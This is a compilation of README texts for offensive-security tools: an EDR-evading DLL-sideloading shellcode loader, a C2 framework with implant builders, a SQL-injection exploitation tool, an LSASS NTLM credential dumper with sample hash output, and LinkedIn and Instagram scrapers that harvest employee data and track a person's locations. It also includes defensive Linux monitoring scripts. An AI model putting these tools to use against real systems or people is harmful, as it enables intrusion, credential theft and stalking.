python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
-i
, --interface
: Specify the network interface (e.g., eth0).-v
, --verbose
: Use this flag for more verbose output.-o
, --output
: Specify the filename to save results.-t
, --target-ip
: Specify a specific target IP address to monitor.-adt
, --analyze-dns-types
: Analyze DNS types.--doh
: Use DNS over HTTPS (DoH) for resolving DNS requests.-fd
, --target-domains
: Filter DNS requests by specified domains.-d
, --database
: Enable database storage for DNS requests.Press Ctrl+C
to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.
To automate the DLL sideloading process and make it more effective, Chimera was created a tool that include evasion methodologies to bypass EDR/AV products. These tool can automatically encrypt a shellcode via XOR with a random key and create template Images that can be imported into Visual Studio to create a malicious DLL.
Also Dynamic Syscalls from SysWhispers2 is used and a modified assembly version to evade the pattern that the EDR search for, Random nop sleds are added and also registers are moved. Furthermore Early Bird Injection is also used to inject the shellcode in another process which the user can specify with Sandbox Evasion mechanisms like HardDisk check & if the process is being debugged. Finally Timing attack is placed in the loader which using waitable timers to delay the execution of the shellcode.
This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.
Chimera is written in python3 and there is no need to install any extra dependencies.
Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.
Someone can create userenv.dll which is a missing DLL from Microsoft Teams and insert it to the specific folder to
โ %USERPROFILE%/Appdata/local/Microsoft/Teams/current
For Microsoft OneDrive the script uses version DLL which is common because its missing from the binary example onedriveupdater.exe
python3 ./chimera.py met.bin chimera_automation notepad.exe teams
python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive
Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.
For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.
Step 1: Creating a New Visual Studio Project with DLL Template
ย
Step 2: Importing Images into the Visual Studio Project
Step 3: Build Customization
Step 4: Enable MASM
ย
Step 5:
Step 1: Change optimization
ย
Step 2: Remove Debug Information's
To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource
https://evasions.checkpoint.com/
https://github.com/Flangvik/SharpDllProxy
https://github.com/jthuraisamy/SysWhispers2
https://github.com/Mr-Un1k0d3r
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json
file. Additionally, you can leverage an exclusion file called exclusions.json
for skipping files matching specific extensions. Provide the root folder as the --directory
flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to parse all 3 account reports:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.
These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.
The scripts are located in the directory scripts/
. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.
Each script has a configuration file in the scripts/config/
directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.
The scripts/lib/
directory contains code that is shared between different scripts.
Scripts using a monitor_
prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init
argument.
Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.
The shared configuration file scripts/config/config.py
contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/
directory. If no configuration file was found, a default setting is used and the results are printed out.
Finally, you can run all configured scripts by executing start_search.py
(which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.
If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:
Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).
Configure the scripts that you want to run using the configuration files in the scripts/config/
directory.
Execute start_search.py
with the --init
argument to initialize the scripts with the monitor_
prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.
Set up a cron job as root
user that executes start_search.py
(e.g., 0 * * * * root /opt/LSMS/start_search.py
to start the search hourly).
Name | Script |
---|---|
Monitoring cron files | monitor_cron.py |
Monitoring /etc/hosts file | monitor_hosts_file.py |
Monitoring /etc/ld.so.preload file | monitor_ld_preload.py |
Monitoring /etc/passwd file | monitor_passwd.py |
Monitoring modules | monitor_modules.py |
Monitoring SSH authorized_keys files | monitor_ssh_authorized_keys.py |
Monitoring systemd unit files | monitor_systemd_units.py |
Search executables in /dev/shm | search_dev_shm.py |
Search fileless programs (memfd_create) | search_memfd_create.py |
Search hidden ELF files | search_hidden_exe.py |
Search immutable files | search_immutable_files.py |
Search kernel thread impersonations | search_non_kthreads.py |
Search processes that were started by a now disconnected SSH session | search_ssh_leftover_processes.py |
Search running deleted programs | search_deleted_exe.py |
Test script to check if alerting works | test_alert.py |
Verify integrity of installed .deb packages | verify_deb_packages.py |
Python 3 script to dump company employees from LinkedIn API๏ฌ
LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.
The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format
CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.
LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.
li_at
session cookie value e.g. via developer toolsli_at
or temporarily during runtime via the CLI flag --cookie
usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]
options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
# install dependencies
pip install -r requirements.txt
python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
The script will return employee data as semi-colon separated values (like CSV):
โโโ โโโ โโโโ โ โโ โโโโโโโโโ โโโโโโโ โโโ โโโโ โ โโโโโโโ โ โโ โโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโ
โโโโ โโโโ โโ โโ โ โโโโโ โโ โ โโโโ โโโโโโโ โโ โโ โ โโโโ โโโ โโ โโโโโโโโโโ& #9600; โโโโโโโ โโโโโ โ โโโ โ โโโ
โโโโ โโโโโโโ โโ โโโโโโโโโ โโโโ โโโ โโโโโโโโโ โโ โโโโโโ โโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโ โโโ โโโ โ
โโโโ โโโโโโโโ โโโโโโโโ โโ โโโ โ โโโโ โ&# 9617;โโโโโโโ โโโโโโโโโ โโโโ โโโโโโโ โโโ โโโโโโโ โโโโ โ โโโโโโโ
โโโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโ โโโโโโโโ โโโโ โโโโโโโโ โ โโโโโโโ& #9618;โโโโ โโโโ
โ โโโ โโโ โ โโ โ โ โ โโ โโโโ โโ โ โโโ โ โโ โ โโ โ โ โโโ โ โโโโ โ โ โ โโ โ โโโโโ โ โโโ โโ โโ โโ โโโโ
โ โ โ โ โ โโ โโ โ โโโ โโ โโ โ โ โ โ โ โ โ โโ โโ โ โโ โ โ โ โโโโ โ โ โ โ โโโ โ โ โ โ โโ โ โโ
โ โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ โ โ โ โ โ โโโ โ โ โ โ โโ โ โโ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ by LRVT
[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter
[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-
LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.
Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles
. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.
Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.
KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.
The GIF below demonstrates usage of the tool:
KubeStalk is written in Python and requires the requests
library.
To install the tool, you can clone the repository to any directory:
git clone https://github.com/redhuntlabs/kubestalk
Once cloned, you need to install the requests
library using python3 -m pip install requests
or:
python3 -m pip install -r requirements.txt
Everything is setup and you can use the tool directly.
A list of command line arguments supported by the tool can be displayed using the -h
flag.
$ python3 kubestalk.py -h
+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1
[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
usage: ./kubestalk.py <url(s)>/<cidr>
Required Arguments:
urls List of hosts to scan
Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header t o set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.
To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 complaint, i.e. must contain a scheme and hostname (and port if required).
A basic usage is as below:
$ python3 kubestalk.py https://โโโ.โโ.โโ.โโโ:10250
+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1
[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
[+] Loaded 10 signatures to scan.
[*] Processing host: https://โโโ.โโ.โโ.โโ:10250
[!] Found potential issue on https://โโโ.โโ.โโ.โโ:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.
HTTP requests can be fine-tuned using the -t
(to mention HTTP timeouts), -ua
(to specify custom user agents) and the --verify-ssl
(to validate SSL certificates while making requests).
You can control the number of hosts to scan simultanously using the --concurrency
flag. The default value is set to 5.
The output is written to a CSV filea and can be controlled by the --output
flag.
A sample of the CSV output rendered in markdown is as belows:
host | path | issue | type | severity |
---|---|---|---|---|
https://โ.โ.โ.โ:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
https://โ.โ.โ.โ:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
http://โ.โ.โโ.โ:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure |
http://โโ.โโ.โ.โ:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure |
The tool is licensed under the BSD 3 Clause License and is currently at v0.1.
To know more about our Attack Surface Management platform, check out NVADR.
Striker is a simple Command and Control (C2) program.
This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.
A) Agents
B) Backend / Teamserver
C) User Interface
Clone the repo;
$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker
The codebase is divided into 4 independent sections;
This handles all server-side logic for both operators and agents. It is a NodeJS
application made with;
express
- For the REST API.socket.io
- For Web Socket communtication.mongoose
- For connecting to MongoDB.multer
- For handling file uploads.bcrypt
- For hashing user passwords.The source code is in the backend/
directory. To setup the server;
Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).
$ cd backend
$ npm install
$ mkdir static
You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION
is set to in the .env
file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/
.
.env
file;NOTE: Values between <
and >
are placeholders. Replace them with appropriate values (including the <>
). For fields that require random strings, you can generate them easily using;
$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>
Note that SSL_KEY
and SSL_CERT
are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000
This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/
directory.
To setup the frontend;
$ cd frontend
$ npm install
.env
file with the variable VITE_STRIKER_API
set to the full URL of the C2 server as configured above;VITE_STRIKER_API=https://c2.striker.local
$ npm run build
The above will compile everything into a static web application in dist/
directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;
$ cd dist
$ python3 -m http.server 8000
Register
button.REGISTRATION_KEY
in backend/.env
)This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users
tab of the web UI.
To create your first admin account;
users
collection and set the admin
field of the target user to true
;There are different ways you can do this. If you have mongo
available in you CLI, you can do it using;
$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})
You should get the following response if it works;
{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }
You can now login :)
A) Dumb Pipe Redirection
A dumb pipe redirector written for Striker is available at redirector/redirector.py
. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL
macro in the C agent).
The following example listens on port 443
on all interfaces and forward to c2.example.org
on port 443
;
$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
B) Nginx Reverse Proxy as Redirector
$ sudo apt install nginx
/etc/nginx/sites-available/striker
);Placeholders;
<domain-name>
- This is your server's FQDN, and should match the one in you SSL cert.<ssl-cert>
- The SSL cert file to use.<ssl-key>
- The SSL key file to use.<c2-server>
- The full URL of the C2 server to forward requests to.WARNING: client_max_body_size
should be as large as the size defined by MAX_UPLOAD_SIZE
in your backend/.env
file, or uploads for large files will fail.
server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;
location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
$ sudo service nginx restart
Your redirector should now be up and running on port 443
, and can be tested using (assuming your FQDN is striker.local
);
$ curl https://striker.local
If it works, you should get the 404 response used by the backend, like;
{"error":"Invalid route!"}
A) The C Agent
These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/
. It supports both linux and windows hosts. The linux agent depends externally on libcurl
, which you will find installed in most systems.
The windows agent does not have an external dependency. It uses wininet
for comms, which I believe is available on all windows hosts.
Assuming you're on a 64 bit host, the following will build for 64 host;
$ cd agent/C
$ mkdir bin
$ make
To build for 32 bit on 64;
$ sudo apt install gcc-multilib
$ make arch=32
The above compiles everything into the bin/
directory. You will need only two files to generate working implants;
bin/stub
- This is the agent stub that will be used as template to generate working implants.bin/builder
- This is what you will use to patch the agent stub to generate working implants.The builder accepts the following arguments;
$ ./bin/builder
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>
Where;
<url>
- The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.<auth_key>
- The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.<delay>
- Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.<stub>
- The stub file to read, bin/stub
in this case.<outfile>
- The output filename of the new implant.Example;
$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;
$ sudo apt install mingw-w64
Build for 64 bit;
$ cd agent/C
$ mdkir bin
$ make target=win
To compile for 32 bit;
$ make target=win arch=32
This will compile everything into the bin/
directory, and you will have the builder and the stub as bin\stub.exe
and bin\builder.exe
, respectively.
B) The Python Agent
Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/
. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.
There are 2 file in this directory;
stub.py
- This is the payload stub to pass to the builder.builder.py
- This is what you'll be using to generate an implant.Usage example:
$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py
After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!
If you like the project, consider helping me turn coffee into code!
Trackgram
Use Instagram location features to track an account
At this moment the usage of Trackgram is extremly simple:
1. Download this repository
2. Go through the instalation steps
3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your instagram password
- OBJECTIVE: your objective username
+ Optional:
- path_to_csv: the path were the csv file will be stored, including the name
4. Execute it with python3 tracgram.py
Download with $ git clone https://github.com/initzerCreations/Tracgram
Install dependencies using pip install -r requirements.txt
Congrats! by now you should be able to run it: python3 tracgram.py
Provides a heatmap based on the location frequency
Markers displayed on the heatmap indicating:
Graph relating the posts count for an specific location
Generate a easy to process .CSV file
Darkdump is a simple script written in Python3.11 in which it allows users to enter a search term (query) in the command line and darkdump will pull all the deep web sites relating to that query. Darkdump2.0 is here, enjoy!
git clone https://github.com/josh0xA/darkdump
cd darkdump
python3 -m pip install -r requirements.txt
python3 darkdump.py --help
Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12
Darkdump Proxy: python3 darkdump.py --query bitcoin -p
____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|
Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0
usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]
options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity
The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.
MIT License
Copyright (c) Josh Schiavone
An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
pip3
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
or python3 -m pip install -e .
ghauri --help
command.You can download the latest version of Ghauri by cloning the GitHub repository.
git clone https://github.com/r0oth3x49/ghauri.git
--proxy
.-r file.txt
--start 1 --stop 2
--skip-urlencode
Author: Nasir khan (r0ot h3x49)
usage: ghauri -u URL [OPTIONS]
A cross-platform python based advanced sql injections detection & exploitation tool.
General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file
Request:
These options can be used to specify how to connect to the target URL
-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS
Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string
Detection:
These options can be used to customize the detection phase
--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)
Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump
Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs
Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.
A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.
Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.
The DLLMain always returns False
so the processes doesn't keep it.
It only works when RunAsPPL
is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:
Build | Support |
---|---|
Windows 10 version 21H2 | |
Windows 10 version 21H1 | Implemented |
Windows 10 version 20H2 | Implemented |
Windows 10 version 20H1 (2004) | Implemented |
Windows 10 version 1909 | Implemented |
Windows 10 version 1903 | Implemented |
Windows 10 version 1809 | Implemented |
Windows 10 version 1803 | Implemented |
Windows 10 version 1709 | Implemented |
Windows 10 version 1703 | Implemented |
Windows 10 version 1607 | Implemented |
Windows 10 version 1511 | |
Windows 10 version 1507 | |
Windows 8 | |
Windows 7 |
The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.
psyconauta@insulanova:~/Research/dragoncastle|โ python3 dragoncastle.py -h
DragonCastle - @TheXC3LL
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>
Windows server on 192.168.56.20
and Domain Controller on 192.168.56.10
:
psyconauta@insulanova:~/Research/dragoncastle|โ python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
